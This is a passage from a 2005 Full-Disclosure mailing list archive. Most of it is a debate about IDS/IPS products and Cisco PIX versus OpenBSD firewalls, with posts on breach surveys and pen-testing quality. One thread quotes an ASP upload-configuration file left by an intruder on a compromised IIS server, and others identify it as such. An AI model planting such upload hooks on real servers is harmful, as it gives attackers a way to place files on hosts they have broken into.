iD8DBQFDOs1baqoBO7ipriERAlL6AJ42PH5zJVMpIwFFJW5/EaBFl1wLMACgmIV6
iU1iXNZQxpq86/Piz4bL2Bw=
=j0qW
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Michael Holstein]

be lucky to have a budget for a McSE (you want fries with that?)


"Fries with that" ... LMAO .. good one ;)


(In the interests of fairness, you don't need much beefy if you're Cisco -
the listed technical specs on the innards of the PIX-501:

Processor: 133-MHz AMD SC520 Processor
Random access memory: 16 MB of SDRAM
Flash memory: 8 MB
System bus: Single 32-bit, 33-MHz PCI


And try to find a PC with this spec :

Maximum Heat Dissipation: 17.0 BTU/hr, full power usage (5W)

(you could back that one up with a 9v battery for quite some time ..)


Comparing the rated 60Mbytes/sec with that system bus, and the fact that
traditional designs will require at least 2 PCI accesses per (one inbound
from ethernet to memory, and one outbound from memory to the ethernet), and
it becomes clear that there's some major black magic - 2 PCI cycles per only
leaves them 6MBytes/second of PCI bandwidth (and more importantly, also means
that you need to have enough smarts to keep the inbound pipe drained and the
outbound pipe full all the time)


PCI bandwidth at that rate is 127.2MB/sec (big B). Cisco's figure is 
60mb/sec (litte b).


PCI figure is 32B/8b*33.3Mhz*100/1048576 = 127.2MB/sec.
The last part of that accounts for the decimal nature of MHz (10^6) 
versus binary nature of MB (2^20).


(Math not mine .. Google'd from 
http://www.pcguide.com/ref/mbsys/buses/funcBandwidth-c.html)


~Mike.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Valdis . Kletnieks]

On Wed, 28 Sep 2005 17:48:59 BST, "Paul S. Brown" said:

> I suspect the argument here has to be cost-for-cost - in the price range for 
> a 
> decent beefy OpenBSD box you aren't going to be using FWSMs, and I can quite 
> believe that the PIXen in that price range don't perform - the PIX 501 is 
> specced at 60MB/s throughput and the cheapest retail price I can find for it 
> is $678 for the unlimited license version - for the same money you can get a 
> beefy PC which will push quite a bit more than 60MB/s

http://www.dealtime.com/xPO-Cisco_PIX_Firewall_501_PIX_501_BUN_K9
has at the moment 4 quotes from $449 all the way down to $382 including 
shipping.
That's the first non-CISCO, non-sponsored link I got googling for 'PIX-501'.

http://stores.tomshardware.com/search_getprod.php/masterid=515798//
has a 50 user bundle for $489.

http://stores.tomshardware.com/search_getprod.php/masterid=923020
has a 50->unlimited upgrade for $158.  Add to previous for $647.

A lot of sites don't need the "unlimited" license, because they don't have
over 50 IPs on the LAN.

And remember to calculate the TCO - you roll-your-own PC for under $400, you're
not going to be getting as much beefy, and I didn't see any discussion of what
a PIX admin will cost you versus the expense of finding an OpenBSD person -
especially down in the "We only have 10-25 people with PCs" arena where you'll
be lucky to have a budget for a McSE (you want fries with that?)

(In the interests of fairness, you don't need much beefy if you're Cisco -
the listed technical specs on the innards of the PIX-501:

Processor: 133-MHz AMD SC520 Processor
Random access memory: 16 MB of SDRAM
Flash memory: 8 MB
System bus: Single 32-bit, 33-MHz PCI

Comparing the rated 60Mbytes/sec with that system bus, and the fact that
traditional designs will require at least 2 PCI accesses per (one inbound
from ethernet to memory, and one outbound from memory to the ethernet), and
it becomes clear that there's some major black magic - 2 PCI cycles per only
leaves them 6MBytes/second of PCI bandwidth (and more importantly, also means
that you need to have enough smarts to keep the inbound pipe drained and the
outbound pipe full all the time)


pgpiFShMZ5eHL.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Is the Bottom Line Impacted by Security Breaches?

[Michael Holstein]

In the paper I ask: "If 40 million customer credit card numbers are
exposed in a security breach at the credit card processor CardSystems, why
do a significant number of people not cancel their Visa and/or
Mastercard?"


Simple .. because Mastercard/Visa got to avoid having to notify their 
customers of the breach :


http://www.consumeraffairs.com/news04/2005/cardsystems_court.html

~Mike.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Lew Wolfgang]

Hi Kevin,

Yes, they will give you a no-extra-cost Windows-based program
to create custom rules.  We've got one, but I haven't
used it yet.  I'm still brushing up on my Regex...

Regards,
Lew

Kevin Pawloski wrote:
Does the Tipping Point appliance allow you to create custom rules now? 
The last time I tried the appliance (which was over a year ago) that 
'feature' was not yet available.


Kevin

On 9/28/05, *Paul Schmehl* <[EMAIL PROTECTED] 
> wrote:


--On Wednesday, September 28, 2005 15:54:41 +0700 Fajar Edisya Putera
<[EMAIL PROTECTED] > wrote:

 > Dear Experts,
 >
 > Our company plan to install IDS to protect our resources, I'm
already
 > read about snort as NIDS, but, that's software based. I'm interesting
 > with hardware based that will work transparently with our Cisco
PIX, no
 > need to make changes in our firewall. What's your suggestion.
 >
I can highly recommend Tippingpoint.  It's a close to a set and
forget IPS
as I've seen, and it's capable of handling large bandwidth requirements
without bogging down (assuming you've bought the right appliance for
your
bandwidth requirements.)

Paul Schmehl ([EMAIL PROTECTED] )
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
___


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Michael Holstein]

I suspect the argument here has to be cost-for-cost - in the price range for a 
decent beefy OpenBSD box you aren't going to be using FWSMs, and I can quite 
believe that the PIXen in that price range don't perform - the PIX 501 is 
specced at 60MB/s throughput and the cheapest retail price I can find for it 
is $678 for the unlimited license version - for the same money you can get a 
beefy PC which will push quite a bit more than 60MB/s


Okay .. I'll bite.

That 501 is also the size of two decks of cards, laid side-by-side .. 
and will run tirelessly without any intervention for years (it dosen't 
even have a fan). I've personally deployed HUNDREDS of these things and 
never yet seen one go bad without help from lightning. PC power 
supplies, on the other hand .. frequently fall victim to dustbunnies.


I can also FedEx a replacement 501 to timbuktu for no more than $30 (its 
like 5lbs well-packaged) .. and get it there by 8am the next day. GROUND 
service on a whole PC is around twice that.


FWSMs appear to retail around $23,000 - that's on top of the 6500 chassis and 
line cards you need to use it - not exactly a fair comparison.


Yeah, but who pays retail for Cisco gear? .. Everywhere I've worked, 
we've been at close to half of list -- and you get loads of Cisco people 
that'll happily assist with your (no matter how rediculous) config -- 
they even usually speak English (usually...).


For that money you could quite easily put together a farm of boxes that would 
exceed 5GB/s throughput aggregate - whether you'd want to is a different 
question.


Yeah .. you could fill a 19" rack full of servers and accomplish the 
same thing .. but I highly doubt you'd end up accomplishing the same 
reliability (and to do 5gb, you'd only really need a 6503, SUP-2, and 
whatever interface card you want to use -- although you could get away 
using the two gig ports on the sup).


As for cost .. keep in mind what type of interfaces, RAID, memory, etc 
you've got to have to accomplish 5gb ... you can't just slap a 5 gigE 
cards on your PCI bus and expect not to have interrupt and PCI bandwidth 
issues.


Besides .. when we're talking "enterprise-class" networking, what would 
you rather have? .. two racks of BSD boxes with all sorts of complicated 
tricks to keep them load-balanced and redundant? .. or two 6503s where 
you can upgrade the IOS in 5 minutes and hot-swap anything?.


~Mike.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Paul S. Brown]

On Wednesday 28 September 2005 16:56, Michael Holstein wrote:
> > If you NAT a lot, PIX can't handle the load.  It also isn't flexible
> > enough.
>
> Huh? .. the FWSM (which is PIX and you can have 4 of them in a chassis)
> can handle 100 intefaces, 5gpbs, 100k CPS, and 1M concurrent per blade.
>
> http://www.cisco.com/en/US/products/hw/modules/ps2706/ps4452/
>
> Show me an OpenBSD system that can handle 400 interfaces, 20gbps, and 4M
> connections (and can do HSRP, etc).
>
> (I'm not trying to start an open-source "holy war" on a newsgrop .. I
> use pf too, where I need the granularity -- just not on the whole network).

I suspect the argument here has to be cost-for-cost - in the price range for a 
decent beefy OpenBSD box you aren't going to be using FWSMs, and I can quite 
believe that the PIXen in that price range don't perform - the PIX 501 is 
specced at 60MB/s throughput and the cheapest retail price I can find for it 
is $678 for the unlimited license version - for the same money you can get a 
beefy PC which will push quite a bit more than 60MB/s

FWSMs appear to retail around $23,000 - that's on top of the 6500 chassis and 
line cards you need to use it - not exactly a fair comparison.

For that money you could quite easily put together a farm of boxes that would 
exceed 5GB/s throughput aggregate - whether you'd want to is a different 
question.


P.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Kevin Pawloski]

Does the Tipping Point appliance allow you to create custom rules now?
The last time I tried the appliance (which was over a year ago) that
'feature' was not yet available.

KevinOn 9/28/05, Paul Schmehl <[EMAIL PROTECTED]> wrote:
--On Wednesday, September 28, 2005 15:54:41 +0700 Fajar Edisya Putera<[EMAIL PROTECTED]> wrote:> Dear Experts,>> Our company plan to install IDS to protect our resources, I'm already
> read about snort as NIDS, but, that's software based. I'm interesting> with hardware based that will work transparently with our Cisco PIX, no> need to make changes in our firewall. What's your suggestion.
>I can highly recommend Tippingpoint.  It's a close to a set and forget IPSas I've seen, and it's capable of handling large bandwidth requirementswithout bogging down (assuming you've bought the right appliance for your
bandwidth requirements.)Paul Schmehl ([EMAIL PROTECTED])Adjunct Information Security OfficerUniversity of Texas at DallasAVIEN Founding Member
http://www.utdallas.edu/ir/security/___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Suggestion for IDS

[Vitor Ventura]

I'm not so sure that FWSM runs PIXOS, but with all that interfaces think about 
the rules managment nighmare.

-Mensagem original- 
De: Michael Holstein [mailto:[EMAIL PROTECTED] 
Enviada: qua 28-09-2005 16:56 
Para: full-disclosure@lists.grok.org.uk 
Cc: 
Assunto: Re: [Full-disclosure] Suggestion for IDS




> If you NAT a lot, PIX can't handle the load.  It also isn't flexible
> enough.

Huh? .. the FWSM (which is PIX and you can have 4 of them in a chassis)
can handle 100 intefaces, 5gpbs, 100k CPS, and 1M concurrent per blade.

http://www.cisco.com/en/US/products/hw/modules/ps2706/ps4452/

Show me an OpenBSD system that can handle 400 interfaces, 20gbps, and 4M
connections (and can do HSRP, etc).

(I'm not trying to start an open-source "holy war" on a newsgrop .. I
use pf too, where I need the granularity -- just not on the whole 
network).

~Mike.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Paul S. Brown]

On Wednesday 28 September 2005 16:56, Michael Holstein wrote:
> > If you NAT a lot, PIX can't handle the load.  It also isn't flexible
> > enough.
>
> Huh? .. the FWSM (which is PIX and you can have 4 of them in a chassis)
> can handle 100 intefaces, 5gpbs, 100k CPS, and 1M concurrent per blade.
>
> http://www.cisco.com/en/US/products/hw/modules/ps2706/ps4452/
>
> Show me an OpenBSD system that can handle 400 interfaces, 20gbps, and 4M
> connections (and can do HSRP, etc).
>
> (I'm not trying to start an open-source "holy war" on a newsgrop .. I
> use pf too, where I need the granularity -- just not on the whole network).

I suspect the argument here has to be cost-for-cost - in the price range for a 
decent beefy OpenBSD box you aren't going to be using FWSMs, and I can quite 
believe that the PIXen in that price range don't perform - the PIX 501 is 
specced at 60MB/s throughput and the cheapest retail price I can find for it 
is $678 for the unlimited license version - for the same money you can get a 
beefy PC which will push quite a bit more than 60MB/s

FWSMs appear to retail around $23,000 - that's on top of the 6500 chassis and 
line cards you need to use it - not exactly a fair comparison.

For that money you could quite easily put together a farm of boxes that would 
exceed 5GB/s throughput aggregate - whether you'd want to is a different 
question.


P.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Is the Bottom Line Impacted by Security Breaches?

[Kenneth F. Belva]

White and Case, a top NYC law firm, posted a survey on Data Security
Breach Notifications on September 26, 2005.

>From the press release: "Victims of personal data security breaches are
showing their displeasure by terminating relationships with the companies
that maintained their data, according to a new national survey sponsored
by global law firm White & Case. The independent survey of nearly 10,000
adults, conducted by the respected privacy research organization Ponemon
Institute, reveals that nearly 20 percent of respondents say they have
terminated a relationship with a company after being notified of a
security breach."

White and Case Press release:
http://www.whitecase.com/news/news_detail.aspx?newsid=11731&type=News%20Releases

White and Case Paper:
http://www.whitecase.com/files/tbl_s5107Materials/FileUpload5837/151/Security_Breach_Survey.pdf


My research takes a macro approach: "The keynote address will cover
reputational risk in light of recent disclosures of high profile security
incidents at such institutions as CitiFinancial (Citigroup), Bank of
America and Wachovia, Choicepoint, DSW Shoe Warehouse and Polo Ralph
Lauren. The presentation will create a framework for understanding
reputational risk in light of these recent events that may be applicable
to responding to future incidents."

In the paper I ask: "If 40 million customer credit card numbers are
exposed in a security breach at the credit card processor CardSystems, why
do a significant number of people not cancel their Visa and/or
Mastercard?"

Reputational Risk Keynote Presentation:
http://www.ftusecurity.com/pub/FiTechSummit_final_paper.pdf

I am concerned that the survey is self-selecting. In other words, the
people responding to the survey already have a disposition one way or the
other. Of 51,433 people, only 17.8% (9,154) replied. That means 82.2%
(42,279) did not reply!

I'm not a statistician; is 17.8% statistically significant to determine a
general consensus?

The papers may not be directly contradictory to one another. Please keep
that in mind.

I would be interested to know other's opinions on the matter.

Sincerely,
Kenneth F. Belva, CISSP
http://www.ftusecurity.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-Disclosure] (no subject) cpshost.dll

[Vitor Ventura]

This a DLL used by IIS do handle POST requests, it can be used to upload files.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Suggestion for IDS

[Jan Nielsen]

Hi Pauk

Can i ask what you were doing that a pix could not handle nat wise ?
just wondering since I have done very extensive and complex nat'ing in
pix'es from 506's up to 535's without any performance problems.

Jan

-Original Message-
From: Paul Schmehl [mailto:[EMAIL PROTECTED] 
Sent: 28. september 2005 17:49
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Suggestion for IDS 

--On Wednesday, September 28, 2005 11:37:38 -0400
[EMAIL PROTECTED] 
wrote:

> On Wed, 28 Sep 2005 07:01:34 EDT, "J. Oquendo" said:
>
>> While I do agree with the statement made "Quite frankly, anybody who
>> already has a PIX installed and wants to install an IPS needs to
quantify
>> *exactly* what protection the PIX is failing to provide before they
go
>> shopping for anything" to a degree, I also disagree with that
statement
>> since it eludes to the thinking that solely a PIX will save your ass.
It
>> won't, nor will any other firewall, nor will any other product
combined
>> with any OTHER product and so on.
>
> Obviously, the original poster isn't thinking that a PIX will save
their
> ass, because they're in the market for something in addition :)
>
> They should be figuring out *why* they need more protection (quite
> frankly, for many places, a *properly configured and maintained* PIX
is
> quite sufficient),

Not only was the PIX (for us) not sufficient, it wasn't robust enough. 
We're ditching our PIXes for OpenBSD and pf.

If you NAT a lot, PIX can't handle the load.  It also isn't flexible
enough.

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Michael Holstein]

If you NAT a lot, PIX can't handle the load.  It also isn't flexible 
enough.


Huh? .. the FWSM (which is PIX and you can have 4 of them in a chassis) 
can handle 100 intefaces, 5gpbs, 100k CPS, and 1M concurrent per blade.


http://www.cisco.com/en/US/products/hw/modules/ps2706/ps4452/

Show me an OpenBSD system that can handle 400 interfaces, 20gbps, and 4M 
connections (and can do HSRP, etc).


(I'm not trying to start an open-source "holy war" on a newsgrop .. I 
use pf too, where I need the granularity -- just not on the whole network).


~Mike.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Paul Schmehl]

--On Wednesday, September 28, 2005 11:37:38 -0400 [EMAIL PROTECTED] 
wrote:



On Wed, 28 Sep 2005 07:01:34 EDT, "J. Oquendo" said:


While I do agree with the statement made "Quite frankly, anybody who
already has a PIX installed and wants to install an IPS needs to quantify
*exactly* what protection the PIX is failing to provide before they go
shopping for anything" to a degree, I also disagree with that statement
since it eludes to the thinking that solely a PIX will save your ass. It
won't, nor will any other firewall, nor will any other product combined
with any OTHER product and so on.


Obviously, the original poster isn't thinking that a PIX will save their
ass, because they're in the market for something in addition :)

They should be figuring out *why* they need more protection (quite
frankly, for many places, a *properly configured and maintained* PIX is
quite sufficient),


Not only was the PIX (for us) not sufficient, it wasn't robust enough. 
We're ditching our PIXes for OpenBSD and pf.


If you NAT a lot, PIX can't handle the load.  It also isn't flexible enough.

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Paul Schmehl]

--On Wednesday, September 28, 2005 15:54:41 +0700 Fajar Edisya Putera 
<[EMAIL PROTECTED]> wrote:



Dear Experts,

Our company plan to install IDS to protect our resources, I'm already
read about snort as NIDS, but, that's software based. I'm interesting
with hardware based that will work transparently with our Cisco PIX, no
need to make changes in our firewall. What's your suggestion.

I can highly recommend Tippingpoint.  It's a close to a set and forget IPS 
as I've seen, and it's capable of handling large bandwidth requirements 
without bogging down (assuming you've bought the right appliance for your 
bandwidth requirements.)


Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Valdis . Kletnieks]

On Wed, 28 Sep 2005 07:01:34 EDT, "J. Oquendo" said:

> While I do agree with the statement made "Quite frankly, anybody who
> already has a PIX installed and wants to install an IPS needs to quantify
> *exactly* what protection the PIX is failing to provide before they go
> shopping for anything" to a degree, I also disagree with that statement
> since it eludes to the thinking that solely a PIX will save your ass. It
> won't, nor will any other firewall, nor will any other product combined
> with any OTHER product and so on.

Obviously, the original poster isn't thinking that a PIX will save their ass,
because they're in the market for something in addition :)

They should be figuring out *why* they need more protection (quite frankly, for
many places, a *properly configured and maintained* PIX is quite sufficient),
and exactly what areas they want extra protection.  Amazingly enough, people
who will look at their current car and say "I need a new one, and it needs to
have X, Y, and Z, and maybe W if it adds less than $500 to the bottom-line 
price"
seem to be unable to do similar rational analysis when they go shopping for
security gear.


pgpV5fmOsHmH8.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

[Ademar Gonzalez]

Hi Aditya

On 9/28/05, Aditya Deshmukh
<[EMAIL PROTECTED]> wrote:
> Recently 2 days ago I saw this in a compromised system.
>
>
> Both this file and cpshost.dll were deleted from C:\InetPub\scripts
> This file was recovered but I was unable to recover cpshost.dll
>
>
> Anyone know what is this ?
>

It is a upload script, cpshost.dll is the Posting Acceptor ActiveX control :

http://support.microsoft.com/kb/q230298/


>
> <% Response.Buffer = TRUE %>
>
> Version=1.5
> <%
> PathToPA = "http://"; + Request.ServerVariables("SERVER_NAME") +
> "/scripts/cpshost.dll"
>
>
> PostingURL = PathToPA + "?PUBLISH"
>
> TargetURL = "http://"; + Request.ServerVariables("SERVER_NAME")
> %>
>
> [{8B14B770-748C-11D0-A309-00C04FD7CFC5}]
> PostingURL="<%= PostingURL %>"
> TargetURL="<%= TargetURL %>"
> ComponentInstall="yes"
>

ciao ciao
ademar
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] O-O-O

[Colin]

On 27/09/05, Frank de Wit <[EMAIL PROTECTED]> wrote:

Couldnt help noticing your name is kinda "F-Wit" lol (sorry)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Joel Esler]

Take a look at Sourcefire's (The company who makes Snort) IPS products.

Joel Esler

(pS. Disclaimer, I work for Sourcefire, and am biased to
Sourcefire/Snort's products)

On 9/28/05, Michael Holstein <[EMAIL PROTECTED]> wrote:
> > Really? Is there no software package capable of withholding inspected
> > packages until cleared by said IDS?
>
> Um .. snort-inline anyone?
>
> Michael Holstein CISSP GCIA
> Cleveland State University
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Michael Holstein]

Our company plan to install IDS to protect our resources, I'm already 
read about snort as NIDS, but, that's software based. I'm interesting 
with hardware based that will work transparently with our Cisco PIX, no 
need to make changes in our firewall. What's your suggestion.


My first piece of advice on this is to ignore any company that says they 
deliver a "turnkey" solution. Such a thing doesn't exist.


Any IDS will work with any firewall .. unless, of course, you want to 
connect the two together (eg: dynamically ACL the PIX based on what the 
IDS sees). That, IMHO, is an invitation do DOS yourself (think .. I 
spoof a packet that --looks like an attack-- from your upstream router, 
or smtp server, etc). There's dozens of ways to do this, including free 
with snort.


You can also examine snort's "inline" mode in which you setup bridging 
between two interfaces, and let snort "decide" which packets to forward. 
In order to make such a thing redundant, be prepared to do some fancy 
H/A stuff with a pair of servers.


And don't forget .. an IDS is certianly not "fix and forget" .. it 
requires daily tinkering (new sigs come out daily .. and they're almost 
always noisy and require tuning). In most any decent sized network, 
having a dedicated admin to chase the IDS alerts and keep an eye on 
things is almost a given.


And as for having an IDS "protect" your network .. well .. forget that. 
An IDS is great for statistical research and forensics .. but with 
botnets and whatnot going SSL, you're time/resources are much better 
spent finding your vulnerabilities and patching your hosts.


My $0.02.


Cheers,

Michael Holstein CISSP GCIA
Cleveland State University
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Michael Holstein]

Really? Is there no software package capable of withholding inspected 
packages until cleared by said IDS?


Um .. snort-inline anyone?

Michael Holstein CISSP GCIA
Cleveland State University
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

[Aditya Deshmukh]

Recently 2 days ago I saw this in a compromised system. 


Both this file and cpshost.dll were deleted from C:\InetPub\scripts
This file was recovered but I was unable to recover cpshost.dll 


Anyone know what is this ? 






<% Response.Buffer = TRUE %>

Version=1.5
<%
PathToPA = "http://"; + Request.ServerVariables("SERVER_NAME") +
"/scripts/cpshost.dll"


PostingURL = PathToPA + "?PUBLISH"

TargetURL = "http://"; + Request.ServerVariables("SERVER_NAME")
%>

[{8B14B770-748C-11D0-A309-00C04FD7CFC5}]
PostingURL="<%= PostingURL %>"
TargetURL="<%= TargetURL %>"
ComponentInstall="yes"



Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Exploring Windows CE Shellcode

[Tim Hurman]

Hi,

I have just had chance to put a paper I wrote a little while ago online. 
It discusses the problems involved in writing shellcode for Windows CE/ARM
and goes on to develop an exploit. The full source for the exploit and 
related utilities is included.

http://www.pentest.co.uk/cgi-bin/viewcat.cgi?cat=whitepapers§ion=04_embedded

Tim.

-- 
Tim Hurman - IT Security Consultant - Pentest ltd.
Email disclaimer: http://www.pentest.co.uk/legal.shtml#emailpolicy


pgp143QmgngTD.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] CORE-Impact license bypass

[sk]

>what i criticize is that *lots* of companies (at least here in my
>vicinity) are selling cheap "vulnerability assessments" which actually
>are nothing more than automated security scans. this leads to the
>customer feeling safe when he's really wide open to attacks. often,
>these people's networks can be rooted in no time.
>sure, you don't have to be uber-31337 to do penetration tests (i'm
>certainly not), but it should definitely go beyond the
>"scan--+--google-for-exploit" approach.

i totally agree on that. another thing i have to say is that you can sell
your auto
penetration tests, but those which advertise with *professional* pen-tests
should actually know how to exploit a bug and understand the concept
and not just run an automated tool as thats simply a rip off of the
customer.
too many of those consultants just do the bullshit talking to convince the
customer to keep buying their services. they dont need to know much..
and certainly dont. every real professional can't do his job without manual
work.
that includes auditing custom php/cgi scripts which where written specific
for
the target system for example and such things wont be spotted by the
automated tools. this could lead to undetected command execution,sql
injection
or info leak bugs on the customer system, which a hacker will easily spot if
he
does his usual manual work. so a pen test is way more reliable and
professional
if its done with real hacking or do you think real hackers only use
automated tools ?
script kiddies do, but those are unprofessional cluless kids and its the
same compared
to penetration tests. real pen testers know how to hack a system and lame
ones just
run automated tools.

-sk

GroundZero Security Research and Software Development
http://www.groundzero-security.com

Wir widersprechen der Nutzung oder Übermittlung unserer Daten
für Werbezwecke oder für die Markt- oder Meinungsforschung (§ 28 Abs. 4
BDSG).

pub  1024D/69928CB8 2004-09-27 Stefan Klaas <[EMAIL PROTECTED]>
sub  2048g/2A3C7800 2004-09-27

Key fingerprint = A93E 41F8 7E82 5F2C 3E76  41F1 4BCF 3096 6992 8CB8

-BEGIN PGP PUBLIC KEY BLOCK-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

mQGiBEFX440RBADGTKOgZR9Y9VA/cfNLWTIN/OmXe9l6UZJ6pY8Hqcv6DFE//Kt9
UfQMU470i+I7SvIHZN066Kl4ts4r90sLxXrE4r5VQCLTsJM68cliatrM8MbbZZs+
xf3ldelZrHNvHkXDk4I/n3O56F9M6tZ/S71AIj++raIbFX57fn8Z8NNOnwCgwDr6
LDVP+5N4DML1/+uvXNtoL30D/A/GUXd6lJ8i7MoZMzwKk1uwDsgWwP+Wm0hMwJMr
fR/di9K55pGdlGFNO5P2L3qOl2BaC8raNkLcXaweW+bao3P66nzpdtmecsjCMWq2
tQWgu/O7S1FgzlUAKJSOc2Th5PY9Raum8bXnSv4gnHZCKjNskIdrz8WDxCzEoPtZ
eCssA/9ydHRvNIPjOTmzjXoE+UbJrB/U//u3dpAsLkzclKeSgjV2eYUgHGcqYn+H
cFoubD78yFWqZqYtxfiyjBlItsIn9ls0gAZFKDFHd1XfOLFSa0/NHNpHLxCZGFIA
tQ0Gp47VRmTPkWJ7lB505w0XioNs1H/1K1RSp++7+t1SNkBlobQpU3RlZmFuIEts
YWFzIDxza0Bncm91bmR6ZXJvLXNlY3VyaXR5LmNvbT6IVwQTEQIAFwUCQVfjjQUL
BwoDBAMVAwIDFgIBAheAAAoJEEvPMJZpkoy4AnYAmwTot1PMUty1YoCuMVg6cpr7
HKy1AJ98jyzD365YkIQAEiihXlQJ4zrxBLkCDQRBV+OvEAgAiu75prsTQZdNijtY
eMQhl4tEL8qi8JOFluYGnvPYjDzU0PY9E4mNx/w2BgYcM3lTVzSmaiLEJ1AzeOHn
w+pLDWsorRZuVI9q3+ExW3s2yFX4ppdHAVBMuYsQyVJRkbobCkcwTbUYXr23pKzh
D8WRAJ991k2lNcQHxMgixAN+55XBFLhwLB0Yz7XmhFYLid5dLxdPllLIV3ZHDeY0
SEqMSpw96+gV0QpX7YH9U2VBr3Wz7Ss6qNZkcgHQw1xmk6Yy24QnT4a9oZD06Yjr
cCocXnyI/YLW1wXo/6Hh44UH3b9mKUX6eh8ybn7QCnZDG7AdxbglLiPTkdcx0YoT
NANZBwADBwf8CrjVKiXSzyhUsdH1es1KQCZ/zH6PvPzdxqYuGuVVMzgaJeeOMS2G
4rLfw2ILahAS0fjng6zX2c1ndPVJ6oAq3IygWsqJH6Uh23NmKTlyx3KtSgyW7YsB
Rn/4wobuojArTHTl+X3U4JZTUEb9E4osB9bFjdsgXcxNSwXghQMh1x5eS5/fcjLd
tACNq0x2/zh8zTJFHK+oNCLY2+iBjTUn7K03rEhQo6HqbPYwyc3LUCwBuFHFDVWp
